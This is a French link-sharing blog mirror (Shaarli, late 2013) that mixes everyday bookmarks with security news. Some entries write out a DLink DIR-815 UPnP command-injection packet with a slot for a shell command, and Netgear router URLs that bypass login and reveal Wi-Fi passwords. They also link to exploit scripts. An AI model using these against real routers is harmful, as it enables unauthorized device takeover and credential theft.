PROJET AUTOBLOG


Shaarli - Liens en vrac de Tiger-222

Site original : Shaarli - Liens en vrac de Tiger-222

⇐ retour index

walter6.jpg (Image JPEG, 500x1172 pixels) - Redimensionnée (75%)

dimanche 3 novembre 2013 à 02:17
Humour à 2 sesterces !
(Permalink)

Michael Abrash's Graphics Programming Black Book Special Edition: Table of Contents

dimanche 3 novembre 2013 à 00:14
(Permalink)

Responsive HTML Emails: a Different Strategy - Fog Creek Blog

dimanche 3 novembre 2013 à 00:02
Petite réflexion sur la mise en page des courriels (lettres d'informations, ...), à garder sous le coude.
(Permalink)

electricity - Why don't electric fish shock themselves? - Physics Stack Exchange

samedi 2 novembre 2013 à 23:59
Pour les poissons électriques (https://fr.wikipedia.org/wiki/Poisson_%C3%A9lectrique) ne s'électrisent pas eux-même ?
Le croquis est juste génial !
(Permalink)

tuto inkscape : un arbre stylisé pour noël | Imppao's Weblog

samedi 2 novembre 2013 à 19:03
Un arbre de Noël avec InkScape. J'ai appris un tac de trucs !

via https://orangina-rouge.org/shaarli/?g4UUqQ
(Permalink)

CryptoPrevent | Computer Technician - PC Repair Software |Foolish IT LLC

samedi 2 novembre 2013 à 16:09
Un petit soft pour prévenir une infection de CryptoLocker. Il suffit de le lancer une fois, ensuite l'exécutable peut-être supprimé.
Pour infos, CryptoLocker est un ransomware bien chiant puisque les fichiers infectés sont chiffrés à l'aide d'un clef RSA 2048 bits, donc pas de crackage de clef possible, il faut vraiment payer (mais ne le faîtes pas !).
(Permalink)

Code Like a Pythonista: Idiomatic Python

samedi 2 novembre 2013 à 01:40
(Permalink)

The badBIOS Analysis Is Wrong. at RootWyrm's Corner

vendredi 1 novembre 2013 à 23:36
Un mec, qui semble calé sur le sujet, critique le fameux #badBIOS.

via http://sebsauvage.net/links/?9_aq-g
(Permalink)

Come on, baby, let's do the twist! by kenglye on deviantART

jeudi 31 octobre 2013 à 12:58
Wow, c'est classe !
(Permalink)

PythonSpeed/PerformanceTips - Python Wiki

mercredi 30 octobre 2013 à 23:17
Quelques conseils pour booster un peu les perf de vos scripts python.
(Permalink)

Eli Bendersky's website » Less copies in Python with the buffer protocol and memoryviews

mercredi 30 octobre 2013 à 20:37
Utiliser les memoryview pour éviter des copies inutiles. En les utilisant, la mémoire est partagée entre deux objets, ce qui permet de piocher directement dedans plutôt que de faire de copie supplémentaire.
(Permalink)

Routeurs déchus - Tiger-222

mercredi 30 octobre 2013 à 01:24
Un guide, si je puis appeler ça ainsi, des routeurs contenant des portes dérobée et comment les exploiter. Comme ça fleurit de partout ces derniers temps, je le garderai à jour, ça pourra toujours servir.
(Permalink)

The Shadow File: DLink DIR-815 UPnP Command Injection

mardi 29 octobre 2013 à 23:54
Ça fait une petite base mine de rien.

Voici le routeur DLink DIR-815 qui se fait rooter, un packet :

M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:uuid:`ICI LA COMMANDE`
MX:2
MAN:"ssdp:discover"

à envoyer en multicast sur 239.255.255.250, pour le port UDP 1900.

Il y a un script python qui permet de lancer la commande désirée : https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection
(Permalink)

The Shadow File: Multi-page Javascript Bookmarklet

mardi 29 octobre 2013 à 23:39
Un bookmarklet pour ouvrir tous les sites désirés dans des onglets => féniasse niveau 99.
(Permalink)

Deprecated Linux networking commands and their replacements | Doug Vitale Tech Blog

mardi 29 octobre 2013 à 22:48
Ça date de 2011, je ne pensais pas que des commandes telles que ifconfig ou netstat puissent devenir obsolètes. Va falloir y jeter un œil attentivement.
Voici le message des développeurs, datant de 2009 : http://lists.debian.org/debian-devel/2009/03/msg00780.html

Je pense mettre à jour Pombo.

via https://www.mypersonnaldata.eu/shaarli/?OeIV2w
(Permalink)

▶ X-MEN: DAYS OF FUTURE PAST - Official Trailer (2014) - YouTube

mardi 29 octobre 2013 à 19:50
Je kiffe !
(Permalink)

Norwester - A Font by Jamie Wilson

mardi 29 octobre 2013 à 16:49
Une police gratuite.
(Permalink)

[ROOT] Framaroot, a one-click apk to root some devices - xda-developers

mardi 29 octobre 2013 à 15:45
Rooter un téléphone Android sans utiliser d’ordinateur.

via Korben
(Permalink)

The Shadow File: Complete, Persistent Compromise of Netgear Wireless Routers

mardi 29 octobre 2013 à 14:48
Que c'est mouvementé en ce mois d'octobre !
Voici une nouvelle porte dérobée découverte dans les routeurs NETGEAR WNDR3700v4, WNDR3800 et WNDR4700.

C'est assez tendu puisqu'en visitant la page suivante, même en redémarrant le routeur, ça reste open bar :
http://<router address>/BRS_02_genieHelp.html

Et pour avoir les mots de passe Wi-Fi en clair... :
http://<router address>/BRS_success.html

Bref, ça pue, ça pue, ça pue !
Mais que font les développeurs, bordel de bordel de merde ?!

Édit : plus d'infos, histoire de passer des commandes shell : http://shadow-file.blogspot.fr/2013/10/netgear-root-compromise-via-command.html
(copie du script) https://tiger-222.fr/paste/?3ec20a62650c94a5#m8h84Z277Ajt/NqYpt1ZeEbGiHwOvzvSGv78v39pjCw=

Édit 2 : apparemment, pas mal de NetGear ont un mot de passe root codé en dur :
https://netgear-telnetenable.googlecode.com/svn/trunk/telnetenable.py
(copie) https://tiger-222.fr/paste/?7b254ecdd7f4887c#O9XModbrfDcCki7HgEX9gpZFy8WuM6YRA8/iPw7SWB0=
(Permalink)

Exploitability: badbios, php.net et la grehack

mardi 29 octobre 2013 à 14:27
Tien, je n'avais pas vu passer ce "badbios", mais s'il s'avère réel, c'en est fini pour nous !
C'est un virus (si on peut appelé ça comme ça) qui infecte le firmware des clefs USB, aucun fichier n'est modifié sur la clef. Comme d'hab, toutes les clefs USB seront à leur tour infectées. Et donc ce virus reflashe le BIOS, même une réinstallation officielle du BIOs n'y changera rien. Le pire dans tout ça, c'est comment il communique...
(Permalink)